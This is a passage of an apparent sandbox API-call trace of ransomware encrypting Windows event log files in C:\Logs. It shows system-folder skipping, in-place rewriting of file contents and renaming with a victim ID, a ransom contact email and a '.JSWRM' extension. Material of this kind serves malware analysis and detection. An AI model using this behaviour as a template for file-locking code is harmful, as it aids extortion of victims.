(lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2=".") returned 1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="..") returned 1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="...") returned 1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="windows") returned -1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="recovery") returned -1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="perflogs") returned -1 [0064.886] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="documents and settings") returned 1 [0064.887] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.887] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="system volume information") returned -1 [0064.887] lstrcmpiW (lpString1="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpString2="msocache") returned -1 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpUsedDefaultChar=0x0) returned 47 [0064.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=47, lpMultiByteStr=0x1f8638, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Client-Licensing-Platform%4Admin.evtx", lpUsedDefaultChar=0x0) returned 47 [0064.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0064.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0064.887] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.887] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.887] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.887] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.895] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.895] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.896] CloseHandle (hObject=0x450) returned 1 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0064.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0064.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0064.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0064.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x218b68 [0064.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0064.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.898] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0064.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0064.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0064.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.900] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cAlternateFileName="MICROS~2.EVT")) returned 1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2=".") returned 1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="..") returned 1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="...") returned 1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="windows") returned -1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="recovery") returned -1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="perflogs") returned -1 [0064.900] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="documents and settings") returned 1 [0064.901] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.901] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="system volume information") returned -1 [0064.901] lstrcmpiW (lpString1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpString2="msocache") returned -1 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=78, lpMultiByteStr=0x22beb0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpUsedDefaultChar=0x0) returned 78 [0064.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", cchWideChar=78, lpMultiByteStr=0x22c170, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", lpUsedDefaultChar=0x0) returned 78 [0064.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0064.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0064.901] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.914] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.915] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.915] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.920] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.920] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.920] CloseHandle (hObject=0x450) returned 1 [0064.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0064.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0064.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0064.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0064.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x218b68 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.922] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0064.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0064.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0064.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0064.923] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9c0f529, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cAlternateFileName="MICROS~3.EVT")) returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2=".") returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="..") returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="...") returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="windows") returned -1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="recovery") returned -1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="perflogs") returned -1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="documents and settings") returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="system volume information") returned -1 [0064.923] lstrcmpiW (lpString1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpString2="msocache") returned -1 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=71, lpMultiByteStr=0x22c7f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpUsedDefaultChar=0x0) returned 71 [0064.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", cchWideChar=71, lpMultiByteStr=0x22c380, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", lpUsedDefaultChar=0x0) returned 71 [0064.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0064.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0064.923] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.924] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0064.924] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.924] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0064.938] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.938] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0064.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.938] CloseHandle (hObject=0x450) returned 1 [0064.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0064.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0064.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0064.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0064.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0064.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.989] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: 